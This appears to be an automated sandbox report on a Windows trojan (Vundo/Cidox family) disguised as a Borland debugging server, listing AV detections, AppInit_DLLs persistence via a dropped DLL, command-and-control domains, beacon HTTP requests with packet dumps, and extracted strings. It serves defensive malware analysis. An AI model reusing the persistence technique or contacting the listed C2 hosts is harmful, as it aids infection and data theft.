Analysis Date2014-10-07 20:19:00
MD5f68c2f91effd7a39cc4c7f3351f96607
SHA15d8dbd83f4fb671919b1aea6a4ee61823614736d

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: d8a5fed253b91ff5638e219a8792179a sha1: 8b9350c85f941bb510cbb8552162ea64971eb508 size: 90112
Section_ASM2 md5: 51a11ec49d3a8768544590ac5bc4550a sha1: c7d0dadf225199c7af60278f5410004167a9da5f size: 62464
Section.rdata md5: 5be8eeb9fca386416f85ea22499ceea0 sha1: 727790a1b349b756866dec182b860ae1ac42c56c size: 7680
Section.data md5: c43f25489763fc8bbec3acd9f119cbdc sha1: 7acd74171259a6259ea08fb6cc0b33f53408ed03 size: 5120
Section.tls md5: bf619eac0cdf3f68d496ea9344137e8b sha1: 5c3eb80066420002bc3dcc7ca4ab6efad7ed4ae5 size: 512
Section.rsrc md5: 0700f6ce8a5c5f57f0abb43c0bfc0e28 sha1: 013ef4a4db6e77f6a2b3b73eb17e54ab68d4b788 size: 17920
Timestamp2012-09-19 02:55:37
VersionLegalCopyright: Copyright © Borland Software Corporation 1990, 2001
InternalName: BORDBG61
FileVersion: 70.08.08.1442
CompanyName: Borland Software Corporation
ProductName: Borland Remote Debugging Server
ProductVersion: 51.00
FileDescription: Borland Remote Debugging Server
OriginalFilename: bordbg61.exe
PackerMicrosoft Visual C++ ?.?
PEhashaf26e5b4eb2514daa0061d83ec752f0abeb3479d
IMPhashe787722303455b7079cc73405b2fb171
AV360 SafeGen:Variant.Spy.5
AVAd-AwareGen:Variant.Spy.5
AVAlwil (avast)Hioles-H [Trj]
AVArcabit (arcavir)no_virus
AVAuthentiumW32/Cidox.A.gen!Eldorado
AVAvira (antivir)TR/Vundo.Gen8
AVCA (E-Trust Ino)no_virus
AVCAT (quickheal)Trojan.Vundo.Gen
AVClamAVno_virus
AVDr. WebTrojan.Mayachok.17763
AVEmsisoftGen:Variant.Spy.5
AVEset (nod32)Win32/Kryptik.ALZU
AVFortinetW32/Citirevo.AB!tr
AVFrisk (f-prot)W32/Cidox.A.gen!Eldorado
AVF-SecureGen:Variant.Spy.5
AVGrisoft (avg)Generic29.BLEL
AVIkarusTrojan-Downloader.Win32.Vundo
AVK7Riskware ( 0040eff71 )
AVKasperskyBackdoor.Win32.Cidox.ub
AVMalwareBytesTrojan.Agent
AVMcafeeVundo-FASV!F68C2F91EFFD
AVMicrosoft Security EssentialsTrojanDownloader:Win32/Vundo.J
AVMicroWorld (escan)Gen:Variant.Spy.5
AVNormanwinpe/Vundo.ELPR
AVRisingno_virus
AVSophosMal/Vundo-K
AVSymantecTrojan.Zatvex!gen6
AVTrend MicroTROJ_VUNDO.SMKK
AVVirusBlokAda (vba32)Backdoor.Cidox
AVYara APTno_virus
AVZillya!no_virus

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates FileC:\Documents and Settings\Administrator\My Documents\Iterra\0105.tmp
Creates FileC:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg

Process
↳ C:\WINDOWS\Explorer.EXE

RegistryHKEY_CURRENT_USER\SessionInformation\ProgramCount ➝
NULL
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Cookies\cf
Creates FileC:\WINDOWS\system32\fnztsch.dll
Deletes FileC:\Documents and Settings\Administrator\My Documents\Iterra\0105.tmp
Deletes FileC:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg
Creates ProcessC:\WINDOWS\regedit.exe /s C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg
Winsock DNS91.233.89.106
Winsock DNSclickbeta.ru
Winsock DNSdenadb.com
Winsock DNSterrans.su
Winsock DNSnsknock.com
Winsock DNStryatdns.com
Winsock DNSclickclans.ru
Winsock DNSdenareclick.com
Winsock DNSgleospond.com
Winsock DNSfescheck.com
Winsock DNSinstrango.com
Winsock DNStegimode.com
Winsock DNSnetrovad.com
Winsock DNSnshouse1.com
Winsock DNSforadns.com
Winsock DNSgetavodes.com
Winsock DNSclickstano.com

Process
↳ C:\WINDOWS\regedit.exe /s C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg

RegistryHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs ➝
C:\WINDOWS\system32\fnztsch.dll\\x00

Network Details:

DNSgetavodes.com
Type: A
141.8.225.80
DNStryatdns.com
Type: A
141.8.225.80
DNSfescheck.com
Type: A
141.8.225.80
DNSnsknock.com
Type: A
209.99.40.222
DNSgleospond.com
Type: A
DNSinstrango.com
Type: A
DNSnetrovad.com
Type: A
DNSterrans.su
Type: A
DNStegimode.com
Type: A
DNSdenadb.com
Type: A
DNSforadns.com
Type: A
DNSclickstano.com
Type: A
DNSdenareclick.com
Type: A
DNSclickbeta.ru
Type: A
DNSnshouse1.com
Type: A
DNSclickclans.ru
Type: A
HTTP GEThttp://getavodes.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1948&av=0&vm=0&al=0&p=39&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg+HRjRJUz9yLGXGIWaLG12IEOgskj59NqQPgHkZkTtPB
User-Agent:
HTTP GEThttp://tryatdns.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1948&av=0&vm=0&al=0&p=39&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg+HRjRJUz9yLGXGIWaLG12IEOgskj59NqVt9vum590fh
User-Agent:
HTTP GEThttp://fescheck.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1948&av=0&vm=0&al=0&p=39&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg+HRjRJUz9yLGXGIWaLG12IEOgskj59NqbApapk11863
User-Agent:
HTTP GEThttp://nsknock.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1948&av=0&vm=0&al=0&p=39&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg+HRjRJUz9yLGXGIWaLG12IEOgskj59NqRB08lrZIwlj
User-Agent:
HTTP GEThttp://91.233.89.106/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1948&av=0&vm=0&al=0&p=39&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg+HRjRJUz9yLGXGIWaLG12IEOgskj59NqbWUB+Ly/B3C
User-Agent:
Flows TCP192.168.1.1:1031 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1032 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1033 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1034 ➝ 209.99.40.222:80
Flows TCP192.168.1.1:1035 ➝ 91.233.89.106:80

Raw Pcap
0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 39343826   XX0000&key=1948&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d333926 6f733d35 2e312e32 3630302e   =39&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
0x000000a0 (00160)   79672b48 526a524a 557a3979 4c475847   yg+HRjRJUz9yLGXG
0x000000b0 (00176)   4957614c 47313249 454f6773 6b6a3539   IWaLG12IEOgskj59
0x000000c0 (00192)   4e715150 67486b5a 6b547450 42204854   NqQPgHkZkTtPB HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a206765   TP/1.1..Host: ge
0x000000e0 (00224)   7461766f 6465732e 636f6d0d 0a0d0a     tavodes.com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 39343826   XX0000&key=1948&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d333926 6f733d35 2e312e32 3630302e   =39&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
0x000000a0 (00160)   79672b48 526a524a 557a3979 4c475847   yg+HRjRJUz9yLGXG
0x000000b0 (00176)   4957614c 47313249 454f6773 6b6a3539   IWaLG12IEOgskj59
0x000000c0 (00192)   4e715674 3976756d 35393066 68204854   NqVt9vum590fh HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a207472   TP/1.1..Host: tr
0x000000e0 (00224)   79617464 6e732e63 6f6d0d0a 0d0a0a     yatdns.com.....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 39343826   XX0000&key=1948&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d333926 6f733d35 2e312e32 3630302e   =39&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
0x000000a0 (00160)   79672b48 526a524a 557a3979 4c475847   yg+HRjRJUz9yLGXG
0x000000b0 (00176)   4957614c 47313249 454f6773 6b6a3539   IWaLG12IEOgskj59
0x000000c0 (00192)   4e716241 7061706b 31313836 33204854   NqbApapk11863 HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a206665   TP/1.1..Host: fe
0x000000e0 (00224)   73636865 636b2e63 6f6d0d0a 0d0a0a     scheck.com.....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 39343826   XX0000&key=1948&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d333926 6f733d35 2e312e32 3630302e   =39&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
0x000000a0 (00160)   79672b48 526a524a 557a3979 4c475847   yg+HRjRJUz9yLGXG
0x000000b0 (00176)   4957614c 47313249 454f6773 6b6a3539   IWaLG12IEOgskj59
0x000000c0 (00192)   4e715242 30386c72 5a49776c 6a204854   NqRB08lrZIwlj HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a206e73   TP/1.1..Host: ns
0x000000e0 (00224)   6b6e6f63 6b2e636f 6d0d0a0d 0a0a0a     knock.com......

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 39343826   XX0000&key=1948&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d333926 6f733d35 2e312e32 3630302e   =39&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
0x000000a0 (00160)   79672b48 526a524a 557a3979 4c475847   yg+HRjRJUz9yLGXG
0x000000b0 (00176)   4957614c 47313249 454f6773 6b6a3539   IWaLG12IEOgskj59
0x000000c0 (00192)   4e716257 55422b4c 792f4233 43204854   NqbWUB+Ly/B3C HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a203931   TP/1.1..Host: 91
0x000000e0 (00224)   2e323333 2e38392e 3130360d 0a0d0a     .233.89.106....


Strings
P.
uriVurittcetorla
\
.CC
 
.
.H.B.
.
d
040904E4
1Cycle through the possible initial break settings9Request that the debugger resynchronize with the debuggee
1Display debugger and debuggee version information
51.00
70.08.08.1442
7Set the initial command for new command browser windows!Toggle the verbose output setting2Display the debugger time for every debuggee event1Display debugger and debuggee version information
8Configure mapping from file extension to source language
About WinDbg
Activate window
BINARY
BORDBG61
bordbg61.exe
Borland Remote Debugging Server
Borland Software Corporation
 Borland Software Corporation 1990, 2001
Cascade all floating windows&Horizontally tile all floating windows$Vertically tile all floating windows
Close all source windows-Close all windows that are error placeholders"Open a new docked window container
CompanyName
Copyright 
CWindowClass
Debug operations
Detach the current program
Display source when possibleGPerform symbol resolution for symbol strings without a module qualifier
Dock all undocked windows
FileDescription
FileVersion
                                 H
         (((((                  H
Halt the current program
Help contents and searches
         h((((                  H
InternalName
iphapi32.dll
KERNEL32.DLL
Kernel debugging control.Cycle through the available baud rate settings
LegalCopyright
Manage event filters
Manage open windows
:Manage windows using the Multiple Document Interface styleDAutomatically open a disassembly window when source is not available
mscoree.dll
Open a command browser window
Open the command window
Open the disassembly window
Open the help index
Open the help search dialog
Open the help table of contents)Open the help for the current window type)Open help for the currently selected text
"Open the process and thread window
Open the registers window
Open the scratch pad window"Open the process and thread window
OriginalFilename
ProductName
ProductVersion
Restart the Program"Stop debugging the current program
Run the Program)Handle the exception and continue running1Do not handle the exception, but continue running
Step over the next statement Step out of the current function1Run the program to the line containing the cursor
StringFileInfo
Toggle the status bar on or off
Toggle the status bar on or off,View or edit the font for the current window
Toggle the toolbar on or off
Trace into the next statement
Translation
Undock all docked windows
VarFileInfo
View program options
View the module list
View WinDbg's command line
VS_VERSION_INFO
 Window arrangement and selection
                          
@^#`!0;
 !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
0A@@Ju
0+Ro2ae
0SSSSS
1p*@G'
1W[Dtax
2=cmsW
2jj+@=
2+or V5L+FW
37-4k+1d8
3d0$nB4
3dDESE
&	}3EM
3'@Q<R]
. 3Th0
@4iW|~
4[nmdM
5:2jupej
5KyadsSz
5vxv@#
6G(^6OP
6G(K6RP
6G(Z6_P
6kt6@u
6RichNP
8Eh3!.
)8ep hZo
9/1gAO
9irtek
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
ADVAPI32.dll
AfvB@,
=[AKQp=
An application has made an attempt to load the C runtime library incorrectly.
aPctWdLZI
`_ASM2
- Attempt to initialize the CRT more than once.
- Attempt to use MSIL code from this assembly during native code initialization
August
b0qFeX
@(BBaB
BB?s#]
Be 5ih
be\\\tixpe2$et
BY INSTALLING AND USING THIS SOFTWARE, YOU ARE CONSENTING TO BE BOUND BY AND ARE BECOMING A PARTY TO THIS AGREEMENT. IF YOU DO NOT AGREE TO ALL OF THE TERMS OF THIS AGREEMENT, CLICK THE "CANCEL" BUTTON AND THE INSTALLATION PROCESS WILL NOT CONTINUE. IF THESE TERMS ARE CONSIDERED AN OFFER, ACCEPTANCE IS EXPRESSLY LIMITED TO THESE TERMS. 
caIGmH5er
 cktfjMaXR-hou
CloseHandle
CorExitProcess
CR8tcm iMs 
CreateBitmap
Created and produced by Whole Tomato, Inc., 1733 Fessler St., Englewood, FL, USA, (408) 323-1590, info@wholetomato.com, www.wholetomato.com.
CreateWindowExA
- CRT not initialized
ctMdy]st
@.data
^daTue
d^DaTR
DDDDDDDD
dddd, MMMM dd, yyyy
December
DecodePointer
DefWindowProcA
DeleteCriticalSection
DISCLAIMER OF WARRANTY. THE SOFTWARE, AND ANY SERVICES THAT YOU RECEIVE FROM WHOLE TOMATO ARE PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND. WHOLE TOMATO HEREBY DISCLAIMS ALL EXPRESS OR IMPLIED WARRANTIES, INCLUDING WITHOUT LIMITATION WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE, AND NON-INFRINGEMENT. THIS DISCLAIMER OF WARRANTY CONSTITUTES AN ESSENTIAL PART OF THIS AGREEMENT. SOME STATES DO NOT ALLOW EXCLUSIONS OF AN IMPLIED WARRANTY, SO THIS DISCLAIMER MAY NOT APPLY TO YOU AND YOU MAY HAVE OTHER LEGAL RIGHTS THAT VARY FROM STATE TO STATE OR BY JURISDICTION. 
DispatchMessageA
&djtzk
dlWnmy
DOMAIN error
DrawTextA
druer\TS
d'("sXA
}dU@p]
d<  u/y
E,4 dl%\d
ea!{]m
(eDuuR
eFmlHQ
 eJnR5ErAr '
em	}r_is8tG
EncodePointer
EnterCriticalSection
ep +nake
ePWoeUie$Lb:cp
E_{}q=4
ExitProcess
EXPORT CONTROLS. You shall comply with all export laws and restrictions and regulations of the Department of Commerce, the United States Department of Treasury Office of Foreign Assets Control ("OFAC"), or other United States or foreign agency or authority, and not to export, or allow the export or re-export of the Software in violation of any such restrictions, laws or regulations (including, without limitation, export or re-export to destinations prohibited either in Country Groups Q, S, W, Y or Z country specified in the then current Supplement No. 1 to Section 770 of the U.S. Export Administration Regulations (or any successor supplement or regulations), or the OFAC regulations found at 31 C.F.R. 500 et seq.). By installing or using the Software, you are agreeing to the foregoing and you are representing and warranting that you are not located in, under the control of, or a national or resident of any restricted country or on any such list. 
February
_FGNSE9ehp
FindWindowA
fj6DN&
- floating point support not loaded
FlsAlloc
FlsFree
FlsGetValue
FlsSetValue
FreeEnvironmentStringsA
FreeEnvironmentStringsW
Friday
FVhxyB
Fvx>2-
g0Ar\<1t=re{r.#e
GDI32.dll
GetACP
GetActiveWindow
GetClientRect
GetCommandLineA
GetCPInfo
GetCurrentProcess
GetCurrentProcessId
GetCurrentThreadId
GetDeviceCaps
GetEnvironmentStrings
GetEnvironmentStringsW
GetFileType
GetLastActivePopup
GetLastError
GetLocaleInfoA
GetMessageA
GetModuleFileNameA
GetModuleHandleW
GetOEMCP
GetProcAddress
GetProcessWindowStation
GetStartupInfoA
GetStdHandle
GetStringTypeA
GetStringTypeW
GetSystemMetrics
GetSystemTimeAsFileTime
GetTickCount
GetUserObjectInformationA
GetVersion
=g=FaF=W=F
GO`_G\W
GRANT. Subject to the terms of this Agreement, Whole Tomato Software, Inc. ("Whole Tomato") hereby grants you a limited, personal, nontransferable, nonsublicensable, royalty-free, nonexclusive license to use one copy of the client software product you are about to install in object code form ("Software"). You may copy the Software for archival purposes, provided any copy must contain all of the original Software's proprietary notices. 
Gr-uyYCn
Gs;:lRv
Gu@P<*'@FhY
GWhxyB
@|!#h|
HeapAlloc
HeapCreate
HeapFree
HeapReAlloc
HeapSize
  H  h 
  H  hH
HH:mm:ss
.[$\HNp
imy^UMY
InitializeCriticalSectionAndSpinCount
InterlockedDecrement
InterlockedIncrement
'IP8oS"R
iQC7hY
ir}ncy
IRYb"gyest
IsDebuggerPresent
IsValidCodePage
JanFebMarAprMayJunJulAugSepOctNovDec
January
J/^e,X
JHMrXcN
j@j ^V
"JSup]
j"Vj-j
j- Wuc
KERNEL32.dll
Khle^[
L$5@?Bf
Last modified: May 9, 2012
lB7ca`eT
|lCet\
LCMapStringA
LCMapStringW
LeaveCriticalSection
lffkxJ
lhEcrQ
lif m7el
LIMITATION OF LIABILITY. You assume the entire risk as to the quality and performance of the Software. Whole Tomato assumes no liability for the cost of any service or repair if the Software is defective 
L@ipy[
"_l"Ir:1kri%t\
ll_moL0
LoadAcceleratorsA
LoadCursorA
LoadIconA
LoadLibraryA
LoadStringA
.lP.tJ
l	qP@<
lstrcmpiA
lt|DLe
-#l:te
l#znfOt
M0.K-7 5
M;9tN'
mbxhVHf
MessageBoxA
MeWencEo
Microsoft Visual C++ Runtime Library
MISCELLANEOUS. This Agreement represents the complete agreement concerning this license between the parties and supersedes all prior agreements and representations between them. It may be amended only by a writing executed by both parties. If any provision of this Agreement is held to be unenforceable for any reason, such provision shall be reformed only to the extent necessary to make it enforceable. This Agreement shall be governed by and construed under California law as such law applies to agreements between California residents entered into and to be performed within California. 
({(mjd
MM/dd/yy
m'o"0C/t
MonAs!
Monday
mr23e~
MultiByteToWideChar
M[xF&c
N.GeUpU_
nh`fsSil
- not enough space for arguments
- not enough space for environment
- not enough space for locale information
- not enough space for lowio initialization
- not enough space for _onexit/atexit table
- not enough space for stdio initialization
- not enough space for thread data
November
 nrev\
n\tiddeBnm%My
__@nV>
n; v;fbv
o2piE8zt
OA&AFR
oaonISl(
October
oDoi)jnvgEKl02Vl
!`  oN
onDaf5aa
op,Hjl
otKIiiSCmit1tdJ
ow<ii7
P6VrCe=
p&(~8F
PetPxt\(;p
PEtVdU
Pl&=8a
Please contact the application's support team for more information.
poDIo: sbluKt $il
poul q e
PPPPPPPP
Pq71pt
Program: 
<program name unknown>
- pure virtual function call
+PwMFN
PXGhp{
P%Yl:YAjQ
qLx|4G 
QMee:youiA
Q{S=]~&b2F
QueryPerformanceCounter
rC@#4@puN
`.rdata
re5reBli
RegConnectRegistryA
RegisterClassExA
RegOpenKeyExA
Re o-ce
r|hb>Ja%NOOAJ
rIpp]Ti
=rm*us
[rogMr
RtlUnwind
runtime error 
Runtime Error!
Ru o=ce
Rxgdx.
Saturday
September
s{et5Ra
SetHandleCount
SetLastError
SetUnhandledExceptionFilter
ShowWindow
SING error
.s+;Kd
SOFTWARE LICENSE AGREEMENT
S(Ptjrgk.
SS]b j
sT;oeknS
strcat
Sunday
SunMonTueWedThuFriSat
t34~jd
t3<sLcr
tDxrokcr
tehw"A
TerminateProcess
TERMINATION. Whole Tomato may, at its sole discretion, terminate this Agreement, the license granted herein, and your right to use or access the Software at any time. On termination, you must destroy all copies of the Software. 
TextOutA
The Software may be installed on more than one computer provided that you are the exclusive user of the Software. As used in this context, "you" shall be defined as an individual human person.
This application has requested the Runtime to terminate it in an unusual way.
This indicates a bug in your application.
This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.
!This program cannot be run in DOS mode.
This Software is protected by both the United States copyright laws and international copyright treaty provisions. You must treat the Software like any other copyrighted material -- for example, a book, except that you may copy it onto a computer to be used and you may make archival copies of the Software for the sole purpose of backing-up our Software and protecting your investment from loss. 
Thursday
TITLE. As between the parties, title, ownership rights, and intellectual property rights in and to the Software, and any copies or portions thereof, shall remain in Whole Tomato and its suppliers or licensors. The Software is protected by the copyright laws of the United States and international copyright treaties. Title, ownership rights, and intellectual property rights in and to any software, data, information, text, pictures, images, or other content ("Content") accessed through the Software or otherwise is the property of the applicable owner and may be protected by applicable copyright or other law. This License gives you no rights, title, or interest to Content (including without limitation Content that you create using the Software). 
$t	jpY
< tK<	tG
=tli<q
TLOSS error
TlsAlloc
TlsFree
TlsGetValue
TlsSetValue
tm<PLt;n
tmUlhzWK
TranslateAcceleratorA
TranslateMessage
t"SS9]
t$<"u	3
Tuesday
tuKP3fY
t,USSVh
;t$,v-
t+WWVPV
u\3hS$4
u	8EP\
uCiCax
ucxaUbLC
u~(	^D
(u$EJ:v=jAp
u&hhwB
UhSf$,
ulc.T/
- unable to initialize heap
- unable to open console device
UNDER NO CIRCUMSTANCES AND UNDER NO LEGAL THEORY, TORT, CONTRACT, STRICT LIABILITY, OR OTHERWISE, SHALL WHOLE TOMATO OR ITS LICENSORS, SUPPLIERS OR RESELLERS BE LIABLE TO YOU OR ANY OTHER PERSON FOR ANY INDIRECT, SPECIAL, INCIDENTAL, OR CONSEQUENTIAL DAMAGES OF ANY CHARACTER INCLUDING, WITHOUT LIMITATION, DAMAGES FOR LOST PROFITS, LOSS OF GOODWILL, WORK STOPPAGE, COMPUTER FAILURE OR MALFUNCTION, OR ANY AND ALL OTHER COMMERCIAL DAMAGES OR LOSSES. IN NO EVENT WILL WHOLE TOMATO BE LIABLE FOR ANY DAMAGES IN EXCESS OF WHOLE TOMATO'S LIST PRICE FOR A LICENSE TO THE SOFTWARE, EVEN IF WHOLE TOMATO SHALL HAVE BEEN INFORMED OF THE POSSIBILITY OF SUCH DAMAGES, OR FOR ANY CLAIM BY ANY OTHER PARTY. THIS LIMITATION OF LIABILITY SHALL NOT APPLY TO LIABILITY FOR DEATH OR PERSONAL INJURY TO THE EXTENT APPLICABLE LAW PROHIBITS SUCH LIMITATION. FURTHERMORE, SOME STATES DO NOT ALLOW THE EXCLUSION OR LIMITATION OF INCIDENTAL OR CONSEQUENTIAL DAMAGES, SO THIS LIMITATION AND EXCLUSION MAY NOT APPLY TO YOU. 
- unexpected heap error
- unexpected multithread lock error
UnhandledExceptionFilter
unhrejat(F
uO^EPD
UpdateWindow
UQPXY]Y[
URPQQh
u-S^3U
US4vBT
USER32.dll
USER32.DLL
U.S. GOVERNMENT RESTRICTED RIGHTS. Use, duplication or disclosure by the Government is subject to restrictions set forth in subparagraphs (a) through (d) of the Commercial Computer-Restricted Rights clause at FAR 52.227-19 when applicable, or in subparagraph (c) (1) (ii) of the Rights in Technical Data and Computer Software clause in DFARS 252.227-7013, and in similar clauses in the NASA FAR Supplement. 
utrGDI
|uVg W{
u(xovop
VirtualAlloc
VirtualFree
v	N+D$
vpa{S{
vx~hvp
*	/"/W`
WaE|D5eA
WbMoezcaYn
Wednesday
*WGeGeT@tnda
WideCharToMultiByte
WriteFile
wwwwwwwwwww
xac	sA
  X  h
XMf|l Ftb
x ;P*tYA
%X[s:oJ
$}Xuss
y]E43u
y"eo_&
You may not, directly or indirectly: modify, translate, reverse engineer, decompile, disassemble (except to the extent applicable laws specifically prohibit such restriction), create derivative works based on, or otherwise attempt to discover the source code or underlying ideas or algorithms of the Software; or copy (except for archival purposes as set forth above), rent, lease, distribute, transfer or otherwise transfer rights to the Software; use the Software for timesharing or service bureau purposes; or remove any proprietary notices or labels on the Software. 
Yrdr*.
>=Yt1j
Z-}2$C
"z\et,q-
z- fg k n<e